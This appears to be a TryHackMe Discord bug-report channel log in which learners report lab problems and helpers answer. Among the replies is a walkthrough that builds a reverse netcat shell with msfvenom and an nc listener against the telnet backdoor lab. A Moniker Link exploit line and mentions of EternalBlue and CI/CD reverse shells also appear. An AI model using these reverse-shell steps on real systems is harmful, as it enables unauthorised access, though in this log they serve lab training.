#room-bugs

1 messages Β· Page 10 of 1

spare mirage
#

You sure πŸ˜„ ? WARNING: include

#

(

lofty adder
#

srly.. I've tried include but required include/ .... thank you

#

why it's asking for that dir?

spare mirage
lofty adder
#

ok thank you @spare mirage πŸ™‚

livid escarpBOT
#

Gave +1 Rep to @spare mirage (current: #19 - 451)

wheat fractal
#

I am so sorry, now that i am seeing the message, yeah i have completed the room. Thanks a lot for helping me.☺️

livid escarpBOT
#

Gave +1 Rep to @spare mirage (current: #19 - 452)

jovial hamlet
#

in metasploit exploitation room they ask to find passwd by bruteforce with given uname 'penny' with smb_login modlue and i did that so with the given wordlist but they showing 0 credentials are matched

21.11.2024_16.39.10_REC.png
grizzled kettle
jovial hamlet
#

i have set this correct;y

21.11.2024_16.51.07_REC.png
weary urchin
honest lantern
unborn pulsar
wheat cargo
#

Hope someone could help me out. I'm just going over the room Moniker Link (CVE-2024-21413). I have followed the instructions and replaced the placeholder in PoC with the attacker machine IP address on the line "<p><a href="file://10.10.55.191/test!exploit">Click me</a></p>. Also replaced the other IP address that was in the instructions. From there I save and execute the script and all seems fine, but when I click the link on the victim machine I get message "We can't find /10.10.55.191/test!exploit". I have read other people's write ups and watched a video walkthrough and it doesn't appear I've missed anything.

Screenshot_2024-11-22_005549.png Screenshot_2024-11-22_005916.png
golden roost
#

I suspect a bug. I tried to restart a machine, the request doesn't work.

image.png
honest lantern
golden roost
#

I think its the endpoint issue. Its not supposed to be exampleX but example1

magic vale
fossil jewel
magic vale
wheat cargo
#

Yes, I've spent a few good amount of hours trying to figure out what is going wrong there. Like I mentioned, I tried seeking help in room-help, online write ups and video walkthroughs and different options but nothing seemed to be working. I was using AttackBox, not my own VM.

pearl tide
#

i dont know if this is a bug

#

however might as well mention it

#

so when i was cd .. out of a directory i was checking through previous commands as i often do when making notes

#

oh boy is there a whole bunch i never used on the cmd

#

Public Key Cryptography Basics

#

is what im on

#

even reboot the machine it persisted my guess

#

it doesnt reset between generation of the room and or a user and the current login

#

machine is crypto Basics v.0.3

#

added a little zip with a video showing with how many commands it allowed me to cycle through

pearl tide
subtle ocean
#

pls fix ur sandbox evasion room issue

rain horizon
#

https://tryhackme.com/r/room/owasptop102021

In OWASP top 10 room task 22, which is SSRF task, getting following error when starting server on attackbox

# nc -lvp 8000
nc: getnameinfo: Temporary failure in name resolution

One needs to add -n

-n: Numeric-only IP addresses, no DNS resolution.

Though in the walkthrough it mentions nc -lvp 80

steel escarp
#

anyone else having an issue with network services with the machine not starting and the ip being invalid?

quaint sparrow
steel escarp
#

i was trying to do task 3 with the enumerating SMB

quaint sparrow
#

And what is happening?

steel escarp
#

when i do the enum4linux -a and then the ip it says it cant find the workgroup/domain and that the server doesnt allow session

#

or does the ips only work with the attackbox's cuz ive been doing them in my own VM of Kali

quaint sparrow
steel escarp
#

nope

quaint sparrow
#

Then that's the issue.

To communicate to the THM network via VM, you need to be on the VPN to the tunnel is unlocked. πŸ™‚

rugged canyon
quartz rain
#

@magic vale @wheat cargo I had the same problem yesterday and then today and asked for help in room-help. @spare mirage was kind enough to try to help me, but after nothing we tried worked, they tried the room and got the same error.

magic vale
quartz rain
dusky junco
dusky junco
quartz rain
dusky junco
#

πŸ˜„ apologies for the insaity troubles. I have a pretty good idea of what's causing it. Will investigate and implement a fix asap next week

pearl tide
waxen geyser
#

in room "REMnux: Getting Started", in task 3 is little typo: "Using the virtual machine attached to task 2, the REMnux VM, navigate to the /home/ubuntu/Desktop/tasks/agenttesla/ directory. Our target file is named agenttelsa.xlsm. Run the command oledump.py agenttesla.xlsm. See the terminal below." The typo is in the filename agenttelsa.xlsm, should be agettesla.xlsm.

patent mesa
#

hey is there bug in the course tracking system
i finished the course but it shows only 33%

quartz rain
# dusky junco πŸ˜„ apologies for the ~~insaity~~ troubles. I have a pretty good idea of what's c...

Since I know how much I don't know, when I can't get something to work, I assume it's something I did (or didn't do) and in most cases, it's either that or a bit of research is required. So when even the fifth attempt at this room didn't work, my impostor syndrome had a field day 😢

However, when the issue gets resolved, I'll print this out to my kids as a proof that it's not always my fault, so I cannot really be unhappy with the whole situation πŸ˜†

patent mesa
#

why is the system tracking keeping at 33% while I have finished the room?

rugged canyon
#

might be if there are multiple versions of the room and the old version you got to 1/3rd done and then you completed the updated version

#

other then that no clue

patent mesa
#

thanks let us wait for the staff maybe they have a solution, I have OCD concerning courses tracking lol

wheat fractal
#

Hi

So on tryhackme some rooms tell you to start a machine so you can get an IP so you can search for that IP and get a website and from there you can solve the room

my problem is the page isn't loading

i need help

ive been trying to solve it for 5 hours now

rugged canyon
quaint sparrow
wheat fractal
quaint sparrow
patent mesa
livid escarpBOT
#

Gave +1 Rep to @rugged canyon (current: #3 - 1958)

wheat fractal
rugged canyon
#

@quaint sparrow they cross posted in tons of channels... from what it looks like in site support it could be country blocked vpn

wheat fractal
rugged canyon
quaint sparrow
wheat fractal
wheat fractal
quaint sparrow
#

Which country are you in?

wheat fractal
wheat fractal
quaint sparrow
wheat fractal
gaunt sedge
#

Is it a known bug for the Pre Security path that you can't get you your achievement for this path because you get stuck at 95% complete due to "Linux fundamentals part 3" being incomplete even though I have a 100% in the room?

wheat cargo
fading path
abstract minnow
#

Hello i complete all module of Linux Fundamentals 2 but appears as i only did 14% of it But i finish it as possible to see in the image

image.png image.png
raven kayak
#

crack the hash - "aReallyHardSalt" -- when in split view mode, the end of the hash is not visible. missing the last 2 characters of the hash. could not side scroll to see if more was there and when selecting the whole line to copy, it still missed the last 2 characters. led to lots of bangin my face into my keyboard before i realised i was missing a part of the hash when i went fullscreen

fierce fractal
#

can anyone help im placeing correct answer and it says that its faklse

quaint sparrow
hexed thistle
devout gazelle
#

Hi, i'm trying the room BurpSuite Basics

#

In the challange it indicate the site http://MACHINE_IP.

#

I tried with localhost but it doesn't works

#

In some video, i looked that there is a specific ip

#

Is it a room bug?

spare mirage
#

πŸ™‚

devout gazelle
#

I had started and was inside the machine but nothing had changed

#

I will now try again by also refreshing the page

spare mirage
devout gazelle
#

Yes

spare mirage
# devout gazelle Yes

Machine that you're attacking and AttackBox aren't the same thing πŸ™‚ . To start the machine you will need to press green Start Machine button in one of Taska after that you will get the actual IP πŸ™‚

devout gazelle
#

It's Task 10 - Site Map and Issue Definitions. There is no Start Machine button

#

This is the room

#

Can you verify please?

spare mirage
devout gazelle
#

Ok! Thank you very much!

waxen geyser
#

SOC Level 1 -> https://tryhackme.com/r/room/yara, Task 6, there is link to Cuckoo Sandbox (link from Task 6: https://cuckoosandbox.org/). The proper link should be: https://cuckoosandbox.org/index.html. The main page directs to some ad site without link to the tool.

TryHackMe
TryHackMe | Cyber Security Training

TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!

cuckoosandbox.org
admin
ν† ν† μ‚¬μ΄νŠΈμ—μ„œ 슀포츠 λ² νŒ…ν•˜κΈ° - 인기 슀포츠뢁 TOP 10 μ•ˆλ‚΄

ν† ν† μ‚¬μ΄νŠΈμ—μ„œλŠ” 좕ꡬ, 경마, ν…Œλ‹ˆμŠ€, 크리켓 λ“± 폭넓은 슀포츠 λ² νŒ… μ‹œμž₯에 λ² νŒ…ν•  수 μžˆμŠ΅λ‹ˆλ‹€. ν•˜λ‹¨μ—μ„œλŠ” ν”Œλ ˆμ΄μ–΄μ—κ²Œ μΆ”μ²œν•˜λŠ” ν”Œλž«νΌ 10 곳을 μ†Œκ°œν•©λ‹ˆλ‹€

cuckoosandbox.org
admin
Automated Malware Analysis - Cuckoo Sandbox - cuckoosandbox.org

Automated Malware Analysis – Cuckoo Sandbox Home About Download […]

lavish river
spare mirage
prime tapir
#

Hey I'm trying to connect to phillip in the Active Directory Basics Room. I can't run successfully the PS command. Why is that i did everything in that room correctly. Anyone knows?

#

And now instance termination so i can't add screenshot.

jolly steppe
shell kindle
#

can anyone pls help.

spare mirage
shell kindle
spare mirage
shell kindle
#

pls check here 😫

spare mirage
shell kindle
#

no.

spare mirage
shell kindle
#

thats fine. but, for me the site showing wrong number.

#

can pls check the url?

spare mirage
shell kindle
#

i tried in different browser too

shell kindle
livid escarpBOT
#

Gave +1 Rep to @spare mirage (current: #15 - 545)

worn niche
#

Hello friends!

I hope you are all well!

I'm new to TryHack, I'm trying to do the first task, and I'm giving the correct answer and the website is showing it as incorrect...

Can you help me?

spare mirage
worn niche
#

Introdução à Segurança

#

Qual das seguintes opçáes representa melhor o processo em que vocΓͺ simula as açáes de um hacker para encontrar vulnerabilidades em um sistema?

Segurança Ofensiva
Segurança Defensiva

spare mirage
#

Offensive security πŸ™‚

worn niche
#

thank you very muchπŸ‘

#

it worked out!

spare mirage
worn niche
#

I will learn!

#

thank you very much

hoary mauve
#

Anyone has a tip for me? It might be a database issue, My Web Application Pentesting says 100%, but a submodul shows 88% so I can't save my cert 😦
If I click into that submodul, it shows 100%, so nothing I can do on my side.

molten cape
#

Hello, all. I am not sure but I am not getting access of the VM's in Networking module by using "tryhackme" password. As per my knowledge the password is same accross the VM's for SSH right?
Working on this https://tryhackme.com/r/room/networkingconcepts

low jungle
#

Hi folks, I'm currently working on a task 7 in the room of Network Services, Exploiting Telnet. I'm not sure if it's a bug or misunderstanding but when I make a telnet connection through the AttackBox, it responds with the commands like .HELP and .EXIT but doesn't respond to .RUN ping [local THM ip] -c 1. I tried to solve it by asking ChatGPT but I couldn't find the solution for the problem. I tried to close it and reconnect it but didn't change. I'll appreciate your help.

spare mirage
spare mirage
low jungle
# spare mirage Could you provide a screenshot πŸ™‚ ?

I wanted to send the image but couldn't, so I send it as text (Is there a reason why I can't send images?)

root@ip-10-10-198-67:~# telnet 10.10.187.232 8012
Trying 10.10.187.232...
Connected to 10.10.187.232.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands
.HELP
.HELP: View commands
 .RUN <command>: Execute commands
.EXIT: Exit
 .RUN ping 10.10.198.67 -c 1
grizzled kettle
last loomBOT
spare mirage
#

.RUN <command-that-you-want-to-run>

hexed thistle
#

IDS fundamentals task 1 links to a room that does not exist.

smoky juniper
#

Telnet room is by far the hardest for beginners lol

spare mirage
smoky juniper
#

I don't know if It is a bug or I haven't really deep dived to find the answer, been stuck here for hours 😭

#

Ohhhh I found KGB's answers similar questions to my problem here on discord, I'll try that

spare mirage
smoky juniper
spare mirage
golden roost
#

Intro to IaC. I am stuck here. Jetpack dude just keeps on jetpacking but deals or received no damage. I have 2 anti-air weapons and tried to increase the range.

image.png
spare mirage
golden roost
#

Also deploying the weapons is sometimes done only beclicking slightly below the box/circle and cloud/on-remise or configuration upgrades don't feel impactful.

spare mirage
#

And In which level you lose πŸ˜„ ?

golden roost
#

Some of these games are quite good. I'd argue they need to leave more time to answer questions. Not everyone speaks English as well and some might think slow, but they are good in principle, just need better testing.

spare mirage
golden roost
#

But I dont know.

spare mirage
golden roost
#

I also had the game window totally black out in lvl 2 on the first attempt.

gaunt ember
#

i copied the date and pasted it, it still says wrong answer

TryHackMe___Windows_Fundamentals_3_27-11-2024_22_02_59.png
rugged canyon
#

they confirmed there was no extra whitespace chars before and after the answer too

low jungle
livid escarpBOT
#

Gave +1 Rep to @last loom (current: #79 - 90)

spare mirage
gaunt ember
#

2 spaces

low jungle
# spare mirage Try to use .RUN ls πŸ™‚

I tried it but still doesn't respond...
"""
root@ip-10-10-48-125:~# telnet 10.10.22.141 8012
Trying 10.10.22.141...
Connected to 10.10.22.141.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands
.RUN ls
.RUN ls
.RUN whoami
.RUN whoami
"""

spare mirage
#

Does || .RUN pwd || return anything ?

low jungle
low jungle
spare mirage
low jungle
livid escarpBOT
#

Gave +1 Rep to @spare mirage (current: #15 - 561)

spare mirage
#

|| sudo tcpdump ip proto \icmp -i ens5 ||

rugged canyon
quaint sparrow
gaunt ember
#

Its done with 2 spaces

quaint sparrow
gaunt ember
#

Nah nah 2 spaces

low jungle
spare mirage
#

Now let's create a payload πŸ™‚

#

Let's use msfvenom πŸ™‚

#

|| msfvenom -p cmd/unix/reverse_netcat lhost=<YOUR-IP> lport=4444 R ||

#

It will give you the command that you need to run on the telnet instance of the vulnerable machine to initiate a connection back to your machine πŸ˜„ .

#

On your machine start a listener to catch a connection πŸ™‚ || nc -lvnp 4444 ||

#

I'm using port 4444 as i am used to it , but you can use any open port above 1024

low jungle
low jungle
spare mirage
#

|| nc -lvnp 4444 ||

#

On your AttackBox πŸ™‚

#

When you start listener run the command that you got as an output on telnet service || .RUN <your-command> || πŸ™‚

#

You should receive a shell πŸ™‚

low jungle
spare mirage
#

n - don't try to resolve domain names

low jungle
livid escarpBOT
#

Gave +1 Rep to @spare mirage (current: #15 - 565)

dry terrace
#

I found a bug, which automatically attaches my cursor to the correct answer in this room:"https://tryhackme[.]com/r/room/networkingsecureprotocols"

ancient blaze
#

I'm having alot of issues with permissions in these "beginner" rooms.

Had first issues with telnet not letting me connect, same with tcp.
tryhackme com/r/room/tcpdump - now I am in this room, and start an machine and i'm getting:

tcpdump: ens5: You don't have permission to capture on that device
(socket: Operation not permitted)

#

I can get past the rooms by just googling all answers but idk xdd

#

Googled myself throug the entire room now x))))))))))))))

lyric sparrow
#

No clue if this is the right room for this, but I am working through the Basic Static Analysis room for a college course. When I got to task 5, I wanted to terminate and restart my machine because of an error I made in answering the questions. However, I got this error message, and the expiry timer has now run out, and the machine still will not terminate (therefore meaning I can't start it again). I tried using the REMOTE TRYHACKME dialog with the provided credentials, but it did not work. Does anyone know how to fix this?

Error_terminating_instances.png
#

Other machines (such as the Basic Dynamic Analysis room's) terminate just fine, and I have already tried logging out and restarting my computer.

twin escarp
#

Hi All,

Sorry to bother, really enjoying the content so far.
I am upto task 8 in the 'intro to Cross-site scripting' room.
It asks me to go to the website from the attackbox (https://ipaddress.p.thmlabs.com)
When I try to access this I get what looks like a possible cert error?
The cert looks to be within date so I'm not sure how to proceed, or if it's just me.
When going to advanced then 'accept the risks and continue' <(this button is greyed out btw)
it has a think for a while and then goes to a 504 gateway time-out screen.

Please help!

unborn pulsar
unborn pulsar
spare mirage
bright sandal
#

.

wheat fractal
#

on the complete beginner path when im entering the first room (https://tryhackme.com/r/room/tutorial) the site loads and immediately blanks when im logged in. when im not logged in the site loads normaly tested on firefox, chromium and safari with addons disabled. does anyone else have the same problem?

spare mirage
lyric sparrow
#

Changing browsers also does nothing

quick violet
lyric sparrow
#

Which area do I paste it into?

quick violet
lyric sparrow
quick violet
#

interesting, it'll die by itself later I guess

lyric sparrow
#

Well, it's been about 20 hours since I first ran into the issue

#

So the expire timer has been sitting at 0m 0s for a while

quick violet
#

interesting

#

@dusky junco we have a vm that doesn't want to die

woeful knot
#

i want to hack nasa

hazy tiger
woeful knot
#

help me bro

#

just write and send me the script of the code

#

please bro

#

help me teach

#

me

hazy tiger
woeful knot
#

hellp me

#

teach em

#

i want it ethically bro

#

just tell me the metasplot commands and code which i have to enter

#

i am a scripty kiddy

#

brah brah

hazy tiger
#

We cannot help you here I'm afraid.
But, if you want to learn how to use metasploit, we have plenty of resources on the website: https://tryhackme.com

Why don't you try it out? 😁

TryHackMe
TryHackMe | Cyber Security Training

TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!

woeful knot
#

help me brah

#

who are you?

#

are you the admin of this group?

hazy tiger
#

I am the community manager πŸ‘‹

woeful knot
#

@hazy tiger

#

okay

wheat fractal
#

Hello, the room tutorial is not working, i copy/paste the IP address in the firefox url bar but I get a 405 error. It bugs me because when i click on resume path, i keep landing there because it wasn't validated.
https://tryhackme.com/r/room/tutorial

#

I posted this in support / room-help too

woeful knot
#

so can you tell me the code which i have to write to make my metasploit payload undetectable in msfvenom???????????????

#

please brah

#

brah brah please brah

hazy tiger
woeful knot
#

bro

wheat fractal
livid escarpBOT
#

Gave +1 Rep to @hazy tiger (current: #5 - 1367)

wheat fractal
crystal bolt
# wheat fractal

Which network is this? The network itself seems to need a reset before the cert push

wheat fractal
crystal bolt
languid escarp
#

Hello, I can't launch Caldera in the caldera room from SOC2 is this a known problem?

spare mirage
languid escarp
#

seems to be venv problem, I get some modulenotfounderror even after installing manually requirement.txt

#

(it's on the AttackBox machine not caldera victim machine)

tall flint
#

Hey! Currently I am doing the room "CI/CD and Build Security".
Task 4 specifies to install "php7.2-cli", this is initially not possible on the attackbox.

It should be listed (or pre-installed) that you have to install:
sudo apt install software-properties-common
add-apt-repository ppa:ondrej/php

Turns out upgrading the attackboxes to Ubuntu20.04 also breaks the runner.
The following command should be executed to make the runner work:
sudo rm /home/gitlab-runner/.bash_logout

gilded estuary
#

Hi, I'm currently doing the "BurpSuite Basics" room, and am having trouble with task 10 as the "foxy proxy" doesn't seem to want to allow traffic through, I have ensured that the port and IP are identical to those laid out in the room but still no luck. Additionally BurpSuite is running

quaint sparrow
gilded estuary
#

I'm running it on the attackbox included on the page

#

and intercept is on

quaint sparrow
#

Are you forwarding the requests in Burp?

spare mirage
gilded estuary
#

Yep that fixed it facepalm

#

Thank you

somber venture
#

Hello room-bugs, just curious is there is a way I can make something like a pull request to update the "task text" (for lack of a better term) on the site?

I'm sure a lack of information is intentional at times (perhaps more than I suspect) but I'm running into some issues that I'm solving with reddit posts in the "Upload Vulnerabilities" room, which is on the "Complete Beginner" path, and I'm not sure if instructions are, let's say missing, or intentionally left out.

unborn pulsar
#

If you have any questions though, just put those in #room-help and folks would gladly help out.

quaint sparrow
#

This has been addressed before, and this won't be made open source.

quaint sparrow
somber venture
#

Appreciate the responses info and scurbz.

#

Scrubz, my expectation was to (on some rooms immediately, but others eventually) help contribute to current and future learning on the site.

eager flower
#

hello, my capstone challenge is not working

eager flower
# eager flower hello, my capstone challenge is not working

First, i can't generate pass list if im using hashcat or john with new rules and then second, when i use hydra it's showing that there is no password found but when i checked the walktrough the correct password are in there. Then i just used the credentials with evolution and it won't login.

sly sail
#

Hello, how can I fix that? I try to import and pip install but it still doesn't work:)

Screen_Shot_2024-11-29_at_22.18.15.png
sly sail
#

@spare mirage

knotty frost
twin escarp
livid escarpBOT
#

Gave +1 Rep to @unborn pulsar (current: #11 - 718)

spare mirage
wheat fractal
#

my answer in a room is correct but it's saying it's a wrong answer, any help?

spare mirage
sly sail
wheat fractal
spare mirage
spare mirage
wheat fractal
#

HTML_INJ3CTION

spare mirage
wheat fractal
#

thanks it worked!πŸ˜„

jagged dagger
#

PROGRAMMING????

faint harbor
#

Hello, in Room "Introduction to SIEM" / Task 2 => What is an "imglogs" ? => typo error ?

spare mirage
wraith ginkgo
#

Hello, Room Moniker Link (CVE-2024-21413) / Task 3 requires Responder -I ens5, but you get a bunch of "check permissions or other servers running" and no response. Running from root.

spare mirage
wraith ginkgo
#

Will a fix be anounced somewhere?

spare mirage
wraith ginkgo
wraith ginkgo
#

Further: Room Metasploit: Exploitation Task 5 expects that Target Machine is vulnerable to EternalBlue. The issue: It isn't.

jovial idol
#

Introduction to honeypots, task 6, first question "What CPU does the honeypot "use"?" and the hint is to "Try reading /proc/cpuinfo". In that file the model name is "Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30 GHz", but it's incorrect, the "correct" answer is "Intel(R) Core(TM) i9-11900KB CPU @ 3.30GHz". Is the answer hard-coded into the question? πŸ˜„

spare mirage
spare mirage
wraith ginkgo
#

Ooh lol

#

Sorry

#

Maybe a good thing to point out a little more clear? I spent quite the time trying to poke hole into it.

#

Don't get me wrong, I had fun doing it.

spare mirage
wraith ginkgo
#

The issue is that "start machine" is grayed out when you have one going. But sure, I'll know now. Its just extra VM power for them.

spare mirage
wraith ginkgo
#

I know, I'm just saying that it gives you the impression that you allready have the machine running.

jovial idol
spare mirage
jovial idol
#

I am reading from target machine

wraith ginkgo
#

The machine i'm on RN is very buggy. Had to turn on and of twice and the command only works like 1/3 times on the VM and never through VPN.

#

Metasploit Exploitation

#

Task 5.

#

I wouldn't mind doing the whole thing on the VM but its sooo slow.

spare mirage
wraith ginkgo
#

does that affect thm?

#

It shouldn't matter for specific exploits for example no? Like the same exploit works 1/6 times with the same settings all 6 times.

#

I'm really starting to question if it was a good idea to buy a whole year. Two out of two rooms bugged for me today for two different reasons.

spare mirage
spare mirage
wraith ginkgo
#

Ah, very good to know.

cinder canopy
#

In the introductions to Linux room there are two inconsistencies. First one is the echo question where it requires that the answer is without quotation mark even though both return the same result. Second one is the question about how many folders are present where it expects the answer 4 but the actual number is 5 since .cache is a directory. Would have attached screenshots from running commands but lacking permission to upload images to channel.

little wharf
#

from room-help / trying to understand if it is a bug:
hi guys, im doing room "Windows Internals" and the machine is giving me different results then the correct answers
[19:44]
on task 2 it asks me for:
What is the process ID of "notepad.exe"?
the correct answer is 5984
but on the machine is 4848
and im using procmon
[19:45]
even on task manager shows 4848 for the pid
[19:46]
it also asks:
What is the integrity level of the process?
correct answer: high
but procmon says: medium

cinder canopy
#

Rather than telling user that 5 folders are wrong I would probably award them for being inventive or taking the extra step

jovial idol
jovial idol
wraith ginkgo
#

I really don't see a point of using an exploit that works 1/10 times, even without mentioning it, to teach people the entry level way of using exploits. I think it's just buggy, no other reason.

quaint sparrow
wraith ginkgo
quaint sparrow
#

In which case this is a fault on the user.

wraith ginkgo
# quaint sparrow 1) because it's probably, if not the top, one of the most well known exploit. 2)...
  1. It's a really lousy reason for using at best a semi-functional exploit which also seems to depend on having a steady line which they don't seem able to provide. You can just tell people about it and either set up the VM so that it's way more likely to work or just simply pick another exploit which has a higher success rate.
  2. Which also isn't something included anywhere. You're just supposed to know these very specific for TryHackMe fixes with limited use in the real world.
#

I've been pressing "run" for about an hour now with tun0 active, zero success. I'm having so much fun, so happy I payed a bunch of money for this.

#

Or you know what, use it but tell people that they're not likely succeding the first 10 times.

quaint sparrow
#

What's your target ip?

wraith ginkgo
#

10.10.120.36

#

I was able to connect once on the very slow Attackbox which I didn't want to stay in because each command took like five minutes.

#

But that was on a different ip.

quaint sparrow
#

You may need a new ip.

wraith ginkgo
#

I've dealt with maybe five or six.

#

But sure, lets try another one.

#

If you have any power on the site, please remove the waiting time or at least reduce it when loading machines for paying customers. If people abuse it, just block new creations for a little time.

quaint sparrow
#

I have none, and the waiting time is standard, you're booting up a VM after all.

wraith ginkgo
#

Fair enough

#

Same thing with the new IP, 10.10.128.89.

#

Stuck on "Triggering free of corrupted buffer."

quaint sparrow
#

Can you verify and share a screenshot.

last loomBOT
wraith ginkgo
#

Pinged you in the subs-room-help @quaint sparrow

fast halo
#

In the Complete Beginner path, I cannot access the very first Tutorial page. I have moved on to the lessons in the path, but, I cannot complete the Complete Beginner path because I am stuck at the Tutorial page.

To reproduce the problem:

The same thing happens on:

  • Windows: Edge, Chrome
  • Ubuntu: Firefox, Chrome.

Can the Customer Support solve this problem? I am frustrated with this because I have subscribed to THM and I cannot complete the path because of this path. If it can happen to this path, may be I will encounter the same issue in future lesson.

spare mirage
spare mirage
#

Then try to read the file πŸ™‚

eager flower
#

i have a problem with connecting to webmail's rdp on capstone challenge. I can connect to vpn with the same credentials but not to pc.

wheat fractal
#

I'm in windows fundamentals 1, getting an error while trying to access the machine

spare mirage
random steppe
#

Hi! I am trying to do Advent of Cyber day 1, the machine is running, but I get an β€˜user does not have access to that room’ error when I try to open the Attack box… any ideas what the issue might be, please?

#

Does it just mean it’s too busy atm?

lyric sparrow
glossy jackal
#

Hey everyone, I am a new cyber learner on https://tryhackme.com/r/room/enumerationbruteforce. I have been trying to get through task 4 and 5 but it seems like Burp Suite is not capturing the request as it should according to walkthrough. Can anyone help me please?\

misty gull
strong loom
wary beacon
low terrace
quaint sparrow
#

If you're reporting issues with a room, can you please tell the team which issues.

low terrace
#

I'll write em up tomorrow sorry lads

frosty violet
#

I found an extremely unimportant typo in a room - in Red Team Fundamentals, in the View Site activity on page 6. Reporting and Analysis. Exercise is spelt "excercise". A very unimportant nitpick, but I thought I'd shoot it over here anyway blobfingerguns

lyric sparrow
#

Typos are not bugs (usually)

quaint sparrow
#

In turn, the typo could cause a bug.

frosty violet
lyric sparrow
dusky junco
final nebula
#

In Wireshark: The basics; in Task 4 it asks me to to "export packet bytes" by right-clicking a jpeg section after i looked at packet 12. But i dont get the correct options. I have no option that says export anything.
This only happens if I use the attackbox in the task. If i use wireshark on my PC it shows up like it should. Did i mess something up or why is this?
If anyone can help i would appreciate it.

blissful sun
#

Has anyone reported issues within the Red Team OpSec room? I cant seem to view the numbers or proper sequence in the site

quaint sparrow
blissful sun
wise abyss
#

Yo, when I'm trying to access the link they gave me in the 2 task of the Christmas event it just says "Error gateway 502" and it just doesnt load. What should I do?

quaint sparrow
blissful sun
#

If there is a legit bug, not feature. Can I haz swag? Lol πŸŽ…πŸΎ

blissful sun
#

I dont see the numbers specified

quaint sparrow
#

You drag and drop.

blissful sun
#

Ugh, i knew it. Ok, so ill try again

#

thank you, i was dragging on top of exisiting categories

quaint sparrow
#

πŸ˜„ It's ok.

blissful sun
wise abyss
#

Yo, when I'm trying to access the link they gave me in the 2 task of the Christmas event it just says "Error gateway 502" and it just doesn't load. What should I do?

next current
#

Hello! I am unable to access frostypinesresort.thm even if I type in the IP address directly into the browser anyone know why ?

quaint sparrow
next current
hexed shard
silent ginkgo
#

i just typed http:// frostypines.thm and it loaded up but extremely slow(Might just be me) so I needed to watch the video to be able to complete the questions

feral crypt
#

hello! Can someone please help me with the second day's room? How do I answer the second and third questions?

spare mirage
hollow marsh
wheat fractal
#

hey team, the AD module is bugged

#

the topology is not showing

#

red teaming path

#

picture provided by @novel carbon after I asked for help

breachingADgone.png
novel carbon
wheat fractal
#

and it is actually for all of the AD rooms

tough parcel
#

hello guys I'm in the Splunk basics room. When I try to download the task files I get this error: 500
Something went wrong!

#

I can't provide screenshots

spare scroll
#

Room OWASP Top 10 - 2021 - Task 21 - Unable to download task files. I get the 500 Bugs screen.

tough parcel
spare scroll
#

I wonder if it's site-wide problem with downloads of Task files.

tough parcel
hollow marsh
#

Probably server side prob 😦

spare mirage
tough parcel
livid escarpBOT
#

Gave +1 Rep to @spare mirage (current: #9 - 827)

wheat fractal
#

found a second bug

#

not sure whats going on today

wraith obsidian
livid escarpBOT
#

Gave +1 Rep to @wraith creek (current: #659 - 7)

wraith obsidian
tall flint
#

Hi, is it known that the room CI/CD and Build Security is having dns problems?
Within step 6 it does not want to connect to netcat when running the shell via the Jenkinsfile.
It does connect to the http.server.

I am using the CI/CD subnet as attack IP within the Jenkinsfile and shell script

spare scroll
ember jetty
#

That phrase is not consistent

image.png
ember jetty
wraith obsidian
livid escarpBOT
#

Gave +1 Rep to @spare scroll (current: #2428 - 1)

wraith obsidian
novel carbon
livid escarpBOT
#

Gave +1 Rep to @wraith obsidian (current: #967 - 4)

strange frost
#

help

#

openvpn connect not work

wraith obsidian
#

Is this a private room where you uploaded your own VM or public?

quaint sparrow
trim olive
#

WARNING: AOC2024 day4 task 1 flag-spoiler in mp4

I got a small bug with notepad in todays AOC room. It seemed like it was open "off-screen". thought i would post it here, managed to move it to my fov with windows+leftarrow. Could also have used preview pane or terminal to view the contents of the file so it is not a super impactful bug,

spare mirage
topaz blade
spare mirage
topaz blade
#

I clicked start attackbox at the top of the page

spare mirage
topaz blade
#

Task 7

#

I pressed the green start machine button

#

Within that room

opaque nest
#

Hello,

I'm encountering an issue while trying to access the internal network through the VPN via BreachingAD room. Specifically:

I'm unable to resolve or access http://printer.za.tryhackme.com and similar subdomains (ntlmauth.za.tryhackme.com, thmdc.za.tryhackme.com).
My /etc/resolv.conf is configured with nameserver 10.200.55.201 and search za.tryhackme.com.
The VPN is connected successfully, and I can ping the servers (e.g., 10.200.55.101 responds to pings), but services like HTTP appear filtered or unreachable (e.g., port 80 is filtered).
DNS resolution fails intermittently, and tools like nslookup sometimes return SERVFAIL.
A traceroute to 10.200.55.101 doesn't show hops beyond the VPN gateway.
I've verified that there are no local firewalls or restrictions on my end. Could you please investigate or provide guidance?

Thanks in advance for your assistance!

quaint sparrow
mild prawn
#

Hello, I am having an issue in the AoC day 5 room. The browser within Burp Suite is not connecting to the site. Thank you in advance for any help!

spare mirage
#

Go to Proxy tab > Set Intercept feature to off πŸ˜„

stray jackal
#

Hello.. I am having a problem at https://tryhackme.com/r/room/exploitingad

The THMWRK1 is down. All the other are ok.

β”Œβ”€β”€(rootγ‰Ώkali)-[~]
└─# ping thmwrk1.za.tryhackme.loc
PING thmwrk1.za.tryhackme.loc (10.200.60.248) 56(84) bytes of data.
^C
--- thmwrk1.za.tryhackme.loc ping statistics ---
5 packets transmitted, 0 received, 100% packet loss, time 4081ms

β”Œβ”€β”€(rootγ‰Ώkali)-[~]
└─# ping 10.200.60.248
PING 10.200.60.248 (10.200.60.248) 56(84) bytes of data.
^C
--- 10.200.60.248 ping statistics ---
7 packets transmitted, 0 received, 100% packet loss, time 6183ms

β”Œβ”€β”€(rootγ‰Ώkali)-[~]
└─# ping thmserver1.za.tryhackme.loc
PING thmserver1.za.tryhackme.loc (10.200.60.201) 56(84) bytes of data.
^C64 bytes from 10.200.60.201: icmp_seq=1 ttl=127 time=79.3 ms

β”Œβ”€β”€(rootγ‰Ώkali)-[~]
└─# ping thmserver2.za.tryhackme.loc
PING thmserver2.za.tryhackme.loc (10.200.60.202) 56(84) bytes of data.
^C64 bytes from 10.200.60.202: icmp_seq=1 ttl=127 time=79.7 ms

β”Œβ”€β”€(rootγ‰Ώkali)-[~]
└─# ping distributor.za.tryhackme.loc
PING distributor.za.tryhackme.loc (10.200.60.201) 56(84) bytes of data.
^C64 bytes from 10.200.60.201: icmp_seq=1 ttl=127 time=83.5 ms

mild prawn
spare mirage
mild prawn
livid escarpBOT
#

Gave +1 Rep to @spare mirage (current: #7 - 921)

spare scroll
#

Reported in the room-help already, #room-help message
In room https://tryhackme.com/r/room/weaponizingvulnerabilities
